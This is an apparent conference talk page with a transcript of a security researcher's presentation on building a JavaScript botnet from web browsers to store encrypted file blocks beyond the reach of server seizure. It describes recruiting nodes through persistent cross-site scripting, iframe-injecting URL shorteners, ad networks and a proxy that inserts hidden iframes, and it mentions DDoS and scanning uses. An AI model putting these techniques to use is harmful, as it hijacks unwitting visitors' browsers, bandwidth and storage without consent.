We're sorry but this page doesn't work properly without JavaScript enabled. Please enable it to continue.
Feedback

HiveMind: Distributed File Storage Using JavaScript Botnets

00:00

Formale Metadaten

Titel
HiveMind: Distributed File Storage Using JavaScript Botnets
Serientitel
Anzahl der Teile
112
Autor
Lizenz
CC-Namensnennung 3.0 Unported:
Sie dürfen das Werk bzw. den Inhalt zu jedem legalen Zweck nutzen, verändern und in unveränderter oder veränderter Form vervielfältigen, verbreiten und öffentlich zugänglich machen, sofern Sie den Namen des Autors/Rechteinhabers in der von ihm festgelegten Weise nennen.
Identifikatoren
Herausgeber
Erscheinungsjahr
Sprache

Inhaltliche Metadaten

Fachgebiet
Genre
Abstract
Some data is too sensitive or volatile to store on systems you own. What if we could store it somewhere else without compromising the security or availability of the data, while leveraging intended functionality to do so? This presentation will cover the methodology and tools required to create a distributed file store built on top of a JavaScript botnet. This type of data storage offers redundancy, encryption, and plausible deniability, but still allows you to store a virtually unlimited amount of data in any type of file. They can seize your server -- but the data's not there! Sean Malone has been building and breaking networks and applications for the last 12 years, and he has a diverse practical and academic background in information technology and security. As a Principal Consultant and the primary engagement manager for FusionX, Sean provides clients across all verticals with sophisticated adversary simulation assessments and strategic security guidance. Sean is a key member of the FusionX internal research and development team and his custom security assessment utilities are used in a majority of FusionX engagements. SeanTMalone.com
23
65
108
SoftwareCoxeter-GruppeCodeBrowserATMURLDistributionenraumRechnernetzProxy ServerServerStandardabweichungReelle ZahlWeb-ApplikationPatch <Software>KontrollstrukturExploitServerPhysikalisches SystemWeb-SeiteGruppe <Mathematik>BildschirmmaskeLesezeichen <Internet>BrowserSpeicher <Informatik>EindeutigkeitElektronische PublikationSoftwareschwachstelleProjektive EbenePunktSoftwareMathematikQuick-SortBitSchaltnetzSoftwaretestSelbst organisierendes SystemOpen SourceTouchscreenRahmenproblemBildgebendes VerfahrenComputersicherheitOrdnung <Mathematik>Web SiteChiffrierungMultiplikationsoperatorKartesische KoordinatenSensitivitätsanalyseLeistung <Physik>DatenverarbeitungProgrammfehlerCross-site scriptingDifferenteNetzadresseKontextbezogenes SystemPublic-domain-SoftwareProgrammLastResultanteRechter WinkelNormalvektorEndliche ModelltheorieTypentheorieProxy ServerInhalt <Mathematik>DistributionenraumCookie <Internet>GamecontrollerCodeDateiverwaltungInformationsspeicherungURLEDV-BeratungHauptidealClientAjax <Informatik>MereologieSocket-SchnittstelleProzess <Informatik>BenutzerbeteiligungThreadGraphische BenutzeroberflächeTelekommunikationFunktionalSoftwarewartungSocketFront-End <Software>RankingMehrrechnersystemVorlesung/Konferenz
Speicher <Informatik>ClientSchlüsselverwaltungSchnittmengeDatenbankRechnernetzDoS-AttackeProzess <Informatik>Gebäude <Mathematik>DateisystemLokales Minimump-BlockBrowserATMKontrollstrukturServerPhysikalisches SystemVerzeichnisdienstKnotenmengeElektronische Publikationp-BlockElektronische PublikationTypentheorieMehrkernprozessorNetzadresseDoS-AttackeDatenverarbeitungServerDefaultPhysikalisches SystemMultiplikationsoperatorLokales MinimumMultiplikationGrundsätze ordnungsmäßiger DatenverarbeitungSoftwareGamecontrollerFront-End <Software>ZahlenbereichWeg <Topologie>DatenbankAdditionChiffrierungSpeicher <Informatik>SchlüsselverwaltungResultanteClientBrowserKontrollstrukturZeichenketteDifferenteElement <Gruppentheorie>VideokonferenzLeistung <Physik>SchnittmengeInformationsspeicherungDateiverwaltungPunktZentralisatorQuick-SortVerzeichnisdienstFrequenzDatenreplikationPeer-to-Peer-NetzStellenringAbfrageMAPThreadZweiSpeicherabzugSoftwareschwachstelleOpen SourceBenutzerbeteiligungTaskFortsetzung <Mathematik>Arithmetisches MittelHeegaard-ZerlegungDatensatzAbstraktionsebeneMini-DiscKartesische KoordinatenAdvanced Encryption StandardWeb-ApplikationCross-site scriptingEinfach zusammenhängender RaumRechter WinkelCodierung <Programmierung>Ruby on RailsHalbleiterspeicher
Elektronische PublikationServerp-BlockKnotenmengeWeb SiteGruppoidComputerBandmatrixProzess <Informatik>Inhalt <Mathematik>Cookie <Internet>Speicher <Informatik>ÄhnlichkeitsgeometrieFunktionalWeb SiteElektronische PublikationServerQuick-SortProzess <Informatik>PerspektiveBandmatrixLeistung <Physik>BenutzerbeteiligungNeuroinformatikInverser Limesp-BlockBenutzerfreundlichkeitChiffrierungElement <Gruppentheorie>Ordnung <Mathematik>Komplexe DarstellungMereologieAdditionComputersicherheitResultanteGamecontrollerCASE <Informatik>DatenreplikationTypentheoriePasswortPhysikalisches SystemPunktZweiHalbleiterspeicherMultiplikationsoperatorAbfrageProgrammverifikationSpeicher <Informatik>Einfach zusammenhängender RaumGrößenordnungBrowserSharewareDatenverarbeitungWeb-ApplikationBildschirmmaskeDifferenteKomponente <Software>FlächeninhaltKartesische KoordinatenInhalt <Mathematik>Flash-SpeicherInformation Retrieval
Inhalt <Mathematik>Cross-site scriptingSkriptspracheSpielkonsoleComputerp-BlockDigital Object IdentifierBildschirmfensterCodeAdressraumMomentenproblemInklusion <Mathematik>Cookie <Internet>Web SiteProxy ServerOpen SourceRechter WinkelAbgeschlossene MengeSpielkonsoleInhalt <Mathematik>SchlussregelDifferenteComputeranimation
Cookie <Internet>AdressraumCodeDigital Object IdentifierGewicht <Ausgleichsrechnung>InformationCross-site scriptingSkriptspracheSpielkonsoleIntegriertes InformationssystemCachingStrukturgleichungsmodellp-BlockSpielkonsoleWarteschlangeBenutzerbeteiligungSocketEinfach zusammenhängender RaumElektronische PublikationProxy Serverp-BlockSpeicher <Informatik>WechselsprungServerComputeranimation
ComputersicherheitVarietät <Mathematik>RechnernetzAdditionRuhmasseCoxeter-GruppeServerATMServerInterface <Schaltung>GamecontrollerElektronische PublikationWeg <Topologie>VerzeichnisdienstNetzadressePasswortWeb-Applikationp-BlockDifferenteMultiplikationsoperatorEinsChiffrierungOrdnung <Mathematik>LastBitProdukt <Mathematik>ZahlenbereichPhysikalisches SystemCookie <Internet>DatenreplikationMailing-ListePunktKartesische KoordinatenWeb-SeiteRuby on RailsEchtzeitsystemSpeicher <Informatik>Computeranimation
AggregatzustandDichte <Stochastik>CodeSoftwareElektronische Publikationp-BlockProjektive EbeneWeb-ApplikationKartesische KoordinatenKonfigurationsraumRuby on RailsComputeranimation
CodeServerElektronische PublikationMultiplikationsoperatorBenutzerbeteiligungZweiRechenschieberDatenreplikationBitComputersicherheitp-BlockSpeicher <Informatik>BrowserGamecontrollerSoftwareGewicht <Ausgleichsrechnung>Güte der AnpassungCodePhysikalisches SystemPlastikkarteKonfigurationsraumMultiplikationPunktProxy ServerDivergente ReiheLeistung <Physik>InternetworkingClientEinfach zusammenhängender RaumAdditionArithmetisches MittelBandmatrixOffene MengeZahlenbereichWarteschlangeAdvanced Encryption StandardPublic-domain-SoftwareCoxeter-GruppeStellenringWeb SiteTypentheorieBetriebssystemParametersystemInverser LimesTotal <Mathematik>Exogene VariableTouchscreenEindringerkennungSchnitt <Mathematik>TeilbarkeitPi <Zahl>ChiffrierungDreiTermWiederherstellung <Informatik>AlgorithmusVideokonferenzQuick-SortOverhead <Kommunikationstechnik>PaarvergleichOrdnung <Mathematik>WärmeübergangPhysikalismusEinflussgrößeURLNormalvektorRechter WinkelEreignishorizontMomentenproblemComputeranimationVorlesung/Konferenz
Transkript: Englisch(automatisch erzeugt)
Good afternoon. This is Hive Mind. We're looking at distributed file storage using JavaScript botnets. I am Sean Malone, principal security consultant at Fusion X. We are definitely hiring. Fusion X needs a little bit of an introduction, though, so let me tell you a bit about what we do. We do a combination of penetration testing, red teaming, sophisticated
adversary assessments. Basically, we assess your entire organization, not just a particular network or system or application. So if that sounds like something you'd be interested in, hit me up after the talk. The problem that we're looking to solve here is that sometimes even when using encryption to store sensitive data, we run into problems.
That problem is that with encryption, the data is still present. It's simply encrypted. And if it's encrypted in a way that we can recover it, then someone else can force us to
recover it for them, such as a court order or a $5 wrench. So encryption is not always going to be enough. So if we can't simply store the files encrypted on our own systems, what can we do? The first thing that comes to mind, store the files on someone else's system.
That way if your system is seized, then the files aren't there. The problem is that's usually illegal. So what I want to do is look at a way to do that with standard functionality in a way that's at least less illegal. Mostly legal. So the way we do this is standard
functionality, no exploits. We're just using some tips and tricks and looking at the standard features in web browsers. So what I mean by this is that all of the techniques that I'm presenting here, all of the features that my technique uses are used in real web applications.
So there's nothing to patch. Removing these features would break modern web applications. So that's a great advantage here because this is something that's going to work for the foreseeable future. It's not something that is only going to work until some vendor patches a particular vulnerability. First a disclaimer, though. This is a research
project. I'm not responsible for what you do with this software. It's not intended to be used to store critical data at this point. Though the concept should be able to get there eventually. Also, I'm not a lawyer. Nothing in here is legal advice. And I'm not
responsible for anything legal or illegal that you choose to do with this software. Web browsers have undergone some significant changes in the last 15 years or so. We started off with the most basic form of client side storage or the browser cookie. We had
JavaScript for data processing and Ajax or asynchronous JavaScript and XML for that back end client to server communication. That's changed recently with the advent of HTML 5 features. We have all of those older technologies still present in the browser, but
they've all been upgraded. Now we have web storage to store larger amounts of data in the browser. We have web workers that can spin off JavaScript threads that are separate from the main GUI threads. You can do a lot more processing without gumming up your application. And we have web sockets that creates a persistent socket from the client
browser back to the server. So the end result here is that a web browser is basically a computer program that will communicate back to my server, execute any arbitrary code that I hand it and store any arbitrary data that I ask it to store. Sounds like a botnet
node, right? You might ask what about sandboxing? Doesn't that make it impossible to access the system data, execute code on the system? Yes, it does. That's the purpose of some of the browser security improvements, but the short answer is I don't care about that. I don't need to do anything outside of the normal browser security model. I'm
simply running code in the context of the domain that loads the code and accessing data that I've stored on that same domain. So it's all on the same origin. It's all within the browser security policy. Again, these are features, not bugs. So let's look at what it
takes to actually build a botnet on top of web browsers. The first step in building any botnet is going to be the node infestation. How do we actually get our code running on the node? How do we take control of that particular node? The first and most
obvious technique is to simply use a site that you own. If you own a site that's getting a thousand hits every five minutes, then you have the capability to execute whatever code you want on a thousand different web browsers every minute. That's a lot of power. Most sites don't do anything with that, but there's definitely the potential there.
Next one is compromised sites. So any time there's a persistent cross site scripting vulnerability where we can store a piece of JavaScript on the site that is executed every time somebody visits that particular site, we can include every visitor to that compromised site in our botnet by adding that piece of persistent JavaScript onto the
compromised site. URL shorteners are a fun one. Normally you have a URL shortener that simply redirects to the target, but what if we simply load a full screen iframe showing the intended URL and in the background we have a second iframe that is running our botnet
code. You can use add distribution networks. There was a great talk at Black Hat this year about various add distribution networks where instead of distributing an image, you can actually give them an iframe source and they'll put an iframe on the target
pages that then sends traffic back to your site. The intent is to use this for sort of SEO page rank type things, but if you have people going to your site, you can make them a member of your botnet. My personal favorite is the anonymous proxy
server. I stood up an anonymous proxy server, just an open anonymous proxy listening on port 80. Stood this up a few ‑‑ excuse me, port 8080. Stood this up a few weeks ago, let it just sit there, didn't advertise this, didn't solicit traffic at all and right now it's getting hit by about 20,000 unique IP addresses every ten minutes. This is
completely unsolicited traffic. I never promised to do anything with this traffic. I never promised to return any particular content. I never promised that the page I return is the actual page they request. Usually it looks a lot like that page that they request, but it also
has an iframe in it. So it's another great way to build a botnet very easily and very quickly. Command and control is done through the HTML 5 web sockets. This quote here is from the official working group publication on web sockets. To enable web applications to
maintain bidirectional communications with server side processes. That could have been written with botnet communication in mind. That's exactly what you want to do for your command and control channel. When that doesn't work, you should always have a way to fall back to Ajax. Older browsers don't support Ajax and sometimes when you're going
through proxies and such, web sockets and proxies don't play nicely so it's always good to have that additional fall back there so you don't lose your nodes. Data storage is done through HTML 5 web storage. Again, a quote from the working group publication. The part that I like here is web applications may wish to store megabytes of user data. What
they really mean is megabytes of application data. Megabytes of whatever the application server decides to push down to the client. So I'm making that megabytes of my data being stored on all of these different browser nodes. The back end is a Ruby on Rails
application with a MySQL database for the active record database abstraction layer. In addition, I'm running a Redis server as well. Redis is an in memory key value storage that has some nice features for what we're doing here. Redis by default has persistence.
You can disable that meaning when the power is pulled, the Redis values are gone and you can also expire particular keys so say you're uploading a file splitting it into blocks. If those blocks temporarily live in Redis, you can simply set a key expiration there and those
blocks disappear after a particular time. So it's a great way to check sort of the time to live for all of the nodes and the blocks for all the different files. So that's what it takes to build a JavaScript botnet. We're going to be using this JavaScript botnet for
data storage, but there's definitely more that we can do with this. Other fun botnet uses would be network scanning, simply checking to see what ports are open. And again, all of this is coming from your nodes. This does not show as coming from a source IP address of your command and control server. DDoS attacks are another fun one. And data processing with web
workers, anything that you can break up into a relatively discreet task, you can push down to these nodes and have the nodes do all of the heavy lifting for you so long as you can write it in JavaScript. JavaScript is not going to be nearly as efficient as
writing it in something like C, but when you consider that you can spin off multiple threads so you can have four different threads running in four different cores if your node is a quad core system, and if you can do this on, say, a persistent cross site scripting vulnerability on a popular viral video or something, that's a lot of processing
power there. And it's free. Now we have the botnet. Let's look at what it takes to actually build a file system on top of that botnet. First a few definitions here. A file block is what I'm using to refer to a piece of an uploaded file that has a set maximum
size. So a file is going to be made up of multiple file blocks. A node is simply any web browser that's a member of the botnet. And the server is the central command and control server that also serves as sort of the phone book for these files. It's the
directory of what files have been uploaded and where all of these different files live. So when we're storing a file, we upload the file through the web application just like any other web application. And it is going to need to live on the server for
a very short period of time while we execute the following steps. We break this file into the name, the mime type and the data. We take all of this and put it into basically a JSON encoding. So it's a simple string at that point. And encrypt that. And that
returns ‑‑ this is just a simple additional step of AES encryption so that when we push these blocks down to the nodes, the nodes can't see the actual data in the file. The end result is the encrypted data which is a base 64 string. We split that into a bunch of different file blocks that simply take the first 1024 characters, pull those
off into a block, then the next 1024. All of these elements are tunable here. So there's no particular reason that I'm using 1024 depending on the particular file and reliability of the nodes. You may want smaller or larger file sizes. Sounds like it's time
for a quick break. All right. What's this called? Shot the noob. It's really hard to get accepted for a speak ‑‑ for a talk here at DEF CON. So congratulations to our
new speaker. Very competitive. All right. I need someone from the audience. Over there. Come on up. Yep. You. First time at DEF CON. Right. There you go. You guys ‑‑ I don't even say it anymore. To our first time DEF CON attendees and speakers. Not doing
well. Only three shots to go. Oh, God. Three shots this hour. You can just stay
there for the rest of the talk if you need to. We now have file blocks from our
uploaded file. The next step is storing those blocks in our botnet. B1 represents a particular block one from our uploaded file that is living on the server. We're going to pull in a certain number of nodes from our botnet. So we just randomly pick a
certain number of nodes that have checked in with us in the last minute or so. So we know that they are online. We push this block down to the nodes there. And so now the block lives on the nodes and does not live on the server. The server keeps track of which nodes have that particular block. And it keeps track of the checksum for the
block. But it does not keep the block data itself. So now this is going to be a very transient botnet. As nodes come and leave, these particular nodes may only be online for another few minutes. Maybe even another 30 seconds. So what we're doing is we do a
constant heartbeat where every five or ten seconds, depending on how you have this tuned, the nodes are going to be sending up a heartbeat where they basically check in and say, hey, I'm a node. I'm still online. Here's my node ID. Here is the ID and checksum for each block that I have stored in my browser local storage. So
eventually some of these are going to go offline or the data is going to be corrupted either intentionally or unintentionally. We have to keep in mind that we can't trust the nodes here. Somebody running that node could be intentionally modifying the data.
So once the number of live confirmed good nodes drops below a certain value, we then replicate. We pull in a set of new nodes that do not currently have this block. We take the ‑‑ the server sends a query down to the existing good nodes, pulls that block
back up to the server and distributes it to the new nodes so we're back up to that safe level of replication to ensure that we don't lose that block. We have to go through the server. We can't do this in a strict peer to peer fashion because JavaScript can't
actually open a port from within a browser and listen for an incoming connection. From my perspective it would be great if we could but it's not such a great security move. Retrieving a block looks very similar. The server simply sends out a query to all of the
all of the nodes containing a particular block saying hey, please send me this node and the node sends it back up to the server. All of the nodes will send it back up. The server does a checksum verification on the server side to make sure that what it's getting back is what was actually stored. And then it stores that temporarily in the
Redis data store. And it puts it in there with an expiration of say 20 seconds. So all of the blocks are going to be requested and they're stored locally in memory on the server for that time to live. This lets us rebuild the file now. So we've requested all of
these blocks back from the nodes. We simply concatenate them and rebuild that into encrypted data. And the password is provided at this point by the user. And the
decryption is then done providing us with the name, the mime type and the actual file data, rebuild that into a particular file and provide it as a download to the user. And the user is able to download it from the web application and from the user's perspective, once all of this is set up and running, it's very simple. It's
provide a file and a password, upload the file, come back later, provide that password, download the file and have the file back on your system. But this file meantime has been distributed across all of these different nodes. So getting back to where we started this talk, we want to do this so that that file is not living on the server
itself. So when everything goes wrong, here's what happens. Pick your favorite three letter agency. They come in and seize the server because they've heard that you're storing some sort of data that they want to know about. What happens when they seize the
server is that that server goes offline and the nodes go offline. They're no longer connecting to the command and control server. In this case, the block replication is going to fail because the nodes are going offline but they're all going offline. The server
isn't getting that heartbeat. The blocks aren't being replicated to new nodes. The end result is that the blocks are lost. And when those blocks are lost, the server no longer has a correct phone book. The phone book for those blocks is out of dates. It doesn't know where to find those blocks if you want to go back and download that
file. So the end result is that the files are unrecoverable. Now, let me be clear on what I mean by unrecoverable here. It's practically speaking, it's not feasible to recover the file. It is definitely possible to go out and seize all of the nodes or at
least a critical mass of the nodes in the botnet but that's going to be at least an order of magnitude more difficult than simply seizing a file and getting a court order ‑‑ or seizing a server and getting a court order for the owner to decrypt the data on that server. It's also possible to poison the botnet by injecting ‑‑ if you're part of the
three‑letter agency, you inject enough of your own nodes deliberately into this botnet, log all of the block data and then rebuild the file after you seize the server. You have the additional layer of encryption here but as we talked about, sometimes that's not
enough. So the only real protection that you have against this is to have a sufficiently large botnet that it would be difficult to seize every node. There's also a certain element of security through obscurity here where you have to know that this is how the files are being stored before the server is seized. You can't go back afterwards and
inject nodes once the server has gone offline because those blocks can't be recovered in order to be replicated to your nodes. Obviously if the server itself is compromised and I mean compromised instead of seized. So if that three‑letter agency is able to
access the server without the server going offline, then they can issue that rebuild command and intercept the file on the server itself. So there are definitely some limitations to be aware of. But there's always going to be that security usability tradeoff here. And I think that what we have here provides a drastic increase in
security in that it is significantly more difficult to recover the file if you're looking at a server seizure situation. But it's still very usable from the end user perspective. So there's some interesting unanswered legal questions here and I'm
deliberately labeling these unanswered. I have my own personal opinions on these but I think there's still a lot of unknowns here. The first one is, is this legal? I'm calling it mostly legal. There are definitely legal ways to build the botnet such as if
somebody is going to a site that you own. But is the very act of storing a significant amount of data that's unnecessary for the functionality of the site? So the user's intent was not to download that data. Is this legitimate or does that constitute
unauthorized use of a computer? And the same question for bandwidth and processing power. Because any time we're doing all of that heartbeat the block traffic we're using bandwidth and we're using processing power as well. This is even more true if we're doing an actual data processing botnet with web workers. Bandwidth is going to be even
more true if we're, say, conducting some sort of high traffic application using those nodes. I look at this and say, you know, this sounds a lot like a animated flash advertisement. If you go out to a particular site and they push down a flash
advertisement, it's additional bandwidth when that ad is pushed down. It's additional storage at least temporarily in the browser storage there and it's definitely additional processing power. So we're talking about more a difference in quantity as opposed to
quality. My opinion is that legally it's acceptable because somebody did deliberately go to that site and when you go to that site there's sort of an implicit assumption that you're going to download and execute in your browser whatever that site gives to you. There's not
legal precedent in this area. From the other side, what if you're storing data without encryption or without any form of encoding and so it turns up in a forensic search of one
of the nodes. So somebody's running their web browser, happens to become a member of the botnet, you push down data. If their system is later analyzed forensically and this illegal content shows up on their system, that's going to look pretty bad for them. So are
you responsible for data that a site that you deliberately went to, loaded a hidden iframe, pushed down that data onto your computer, are you responsible for that data? I don't know. Demo time. So we'll start off showing the node side of things. This is my
personal website. I'm loading it through this proxy here. I've got it running with Foxy proxy. And if we look at the source for the site, most of this is normal source, but
down at the bottom right before the closing body tag, we've got this hidden iframe. This is done through a simple nginx proxy and there's a rule in there that says do a find and replace on the body content of the response and replace that slash body tag with the
iframe and then the slash body tag. It's really simple. It's very efficient and it pushes out iframes to thousands of different nodes. On the console side of things, we see all of these different requests going back and forth. The check queue and again
I've had this fall back to Ajax because we're going through the proxy. And it's also easier to see because some of Firebug's debugging features haven't really caught up with the persistent web socket connections. So these post requests for check queue are basically saying anything that I need to do. Are there any blocks that you need me to
store? Are there any blocks that you need me to send back to the server? The
post data here is simply the block ID. That's that file block and the UID. And the MD5 checksum for each of those file blocks. So these are blocks that are currently being
stored in this node. So it does that heartbeat every so often to just let it know, hey, I'm still here. These are the blocks. These are the checksums. However, if I close down Firebug, you see my pretty face and no traffic there. So it's all completely
transparent in the background. Here's what the C2 server interface looks like. Again, this is a Ruby on Rails application. We've got a simple interface showing the files that have been uploaded. And there's a separate page here for the nodes. So this is a list
of nodes that have been active within the last minute. In order to retain a little bit more control over this particular demonstration, I'm not having this run with thousands of different nodes. This is just from a few IP addresses and systems that I control here. The last updated time is simply the last time we've heard from the node there. The
UID is something that we store in the ‑‑ in a cookie on the node to keep track of which node is which. And then we correspondingly use that in the Redis data store for tracking which blocks live on which nodes. So let's take a look at what it takes to upload a
file. We simply put in the name of the file, put in a password, choose a file that we're going to upload, and go ahead and upload it. Basically the same as any other web application
file upload. The file itself is assigned a UID for the directory tracking purposes. When we go over to detail, we see it's got this file name that we assigned it, but the original file name is encrypted with the file data and stored out on the nodes. Here's
the listing of all of the file data with each of the file blocks and then the nodes that each file block lives on. So at this point we've got the replication set to four nodes. In a production botnet you definitely want to have that set higher. Say maybe
distribute across 20 different nodes and if it drops below 10 replicate until you're back up to 20. So there's a large number of blocks here because I have my block size set relatively small. Again, all of this is tunable. When we go into the fetch dialogue,
we put the password back in, go ahead and fetch the file. It loads all the different file blocks and looks like I typoed it. I may have typoed it when I created it. There
we go. All right. So and this is a real time loading bar here in that it's actually showing what blocks do we have and which ones are we still waiting on. So as it goes across that's showing we've sent out the request and more and more blocks are coming
in. When it gets to the end we finally have all of the blocks. The file's ready. We can catenate, decrypt with that password that we just provided and the file's downloaded. Yes, we want to keep this file and now we're able to view our data that's getting more and more dangerous to be caught with. I am going to be releasing the code for the botnet
itself. Both the engine X side of things which is basically an engine X configuration
file. That's all there is to it. And then I'm releasing the web application side of things with the Ruby on Rails application. Again, it's a research project. It's not the most stable software out there. But you'll at least be able to see how I do things,
how I track the blocks. All of that is going to be available. Code will be on GitHub, but it will be linked to from my personal site. And the slides will be up there as well, as well as a video of the presentation. With that, I'll open it up for questions.
I think we have two microphones, two different locations in the room here. So if we could use those to make sure I can hear you, that would be great. Yes? Hi. I wanted to ask you what happens if the three letter agency seizes your system while
it's still operating? Still connected to the net? So if they seize it while it's still connected, if they take it offline, the
keep it online, if they are able to take control of the operating system while it stays online, then they would be able to rebuild it. So you want to take the normal physical security measures to make it as difficult as possible for them to take control without actually unplugging the system or at least disconnecting it from the network there.
Thanks. I'm wondering if the Internet connection to the server goes down, does that mean all your files disappear with it, too, because now all nodes are disconnected? Correct. If the Internet connection goes down, if the nodes can no longer talk to the server,
then the data replication fails and the blocks are lost. If it comes back down or if it comes back online quickly enough, probably within five minutes or so, you'll probably have enough nodes left that you can recover the data, but it's not guaranteed. So the purpose of this is definitely to store data where it is better to lose it entirely
than to have somebody recover that data, decrypt it and be able to pin it on you. Thank you. Over here. What about the file size limits of what the browser will let you store? Yes. So each node is generally able to store roughly five megabytes of data without prompting the user, and we definitely don't want the user to be prompted to allow
more data, but that's five megabytes per node. So if you have, say, 10,000 nodes, that's 500,000 megabytes. Even if your replication cuts that by a factor of ten or so, that's still a lot of data that can be stored in this botnet. Yes.
Would it be possible to set a timeout on the Web Storage to make the node side blocks self-destruct after a certain amount of time? Yes. And you can definitely add such a timeout there. It's sort of a fail-safe kill switch type thing where if the node cannot talk to the server within a certain number of seconds, then it simply wipes the local
storage in the browser there so that even if the nodes are recovered or seized, more work has to be done at least in order to access that data. What kind of transfer overhead is there in comparison to the file size, both on the server and the node end?
So in terms of the actual algorithm for the encoding, for the encryption and the encoding, I don't know exactly as a percentage of file size, but it's basically AES encryption or JSON encoding, AES encryption, and then it's just chopping it up into blocks.
I mean how much data is being sent back and forth? What kind of bandwidth are you using compared to the file size? So it's going to depend entirely on how much data you're storing and how much is stored in the browser. Those check queue commands are very small. That's a post request with no data. That's just is there
anything for me to do, and normally it's just getting back an empty array. There's nothing left to do. The heartbeat command is what you saw up there on the screen with the block IDs and the MD5 for each block, so there's a little bit more, but usually it's just getting back a 200 OK response. So it's pretty lightweight. As far as the total
amount of bandwidth, it's going to depend on your tuning parameters for how quickly you're checking that queue and how quickly or how often you're sending the heartbeats. So those can all be tuned depending on how stable the particular nodes in this botnet are. Yes?
Do you have any way of protecting against say a malicious user who connects and sets their local storage to be persistent in their browser versus just I assume you have it set for like a transitory temporary thing so it's not permanent with the domain once it's offline? So we do store it in local storage, meaning that it is going to be more
persistent, and the reason for doing that is say you have a browser with multiple tabs open, if the user ‑‑ if they're all going through that proxy, you want the user to be able to close tabs, move to other tabs and have that data stay there so you're not
needing to replicate unnecessarily. It would be possible to use session storage, which is going to expire more. Again, if ‑‑ no matter what you're doing, if you have a deliberately poisoned botnet and that three‑letter agency is able to get a
sufficiently large number of nodes, a sufficiently high percentage of nodes, then regardless of how you set it, if they're logging that traffic, they'll be able to log those blocks. So it may provide a little bit of additional security, but not significantly so. Yes? Are there any inherent restrictions or reasons why you wouldn't have the clients
connect to a series of failover servers in the event that your power goes out or your Internet connection is dropped? So you could, however, that configuration would need to be pushed down from the C2 server and that gives that three‑letter agency multiple chances.
So if they seize that first server and everything goes offline, if replication is still being done through a second, third, fourth, fifth server, then once they do forensic analysis on the first server, they'll see, well, we screwed up our chances with this one, but we know that we have to take different tactics and possibly poison the botnet since it still exists and is being replicated on those other servers as well.
So again, it would definitely provide a higher availability guarantee, but it would provide a significantly reduced confidentiality guarantee at that point. Yes?
When you mentioned the legal questions outstanding, have you consulted legal counsel about that? I have not. I've got a card for you after. Sounds good, yeah. I'd definitely be interested in exploring that side of things a little bit more. Do you have a sense empirically of what percentage of the file lives on the server at
any given moment because of replication? Empirically, no. Theoretically it depends on how quickly you need to replicate. So the more stable your nodes are, the longer those
nodes are online, the less often you're going to need to replicate. And it's that replication that causes the data to need to flow through the server again. Any time a file is uploaded, any time a file is rebuilt and any time a block is replicated, that data is
stored on the server with a time out of 20 seconds. For a relatively fast botnet where you have at least one node for each block that's going to reply much more quickly than that, you could probably tune that down to more like five or ten seconds. But it's hard to say for sure because it depends entirely on the makeup of that botnet. All right. I
think we're done. Thank you very much.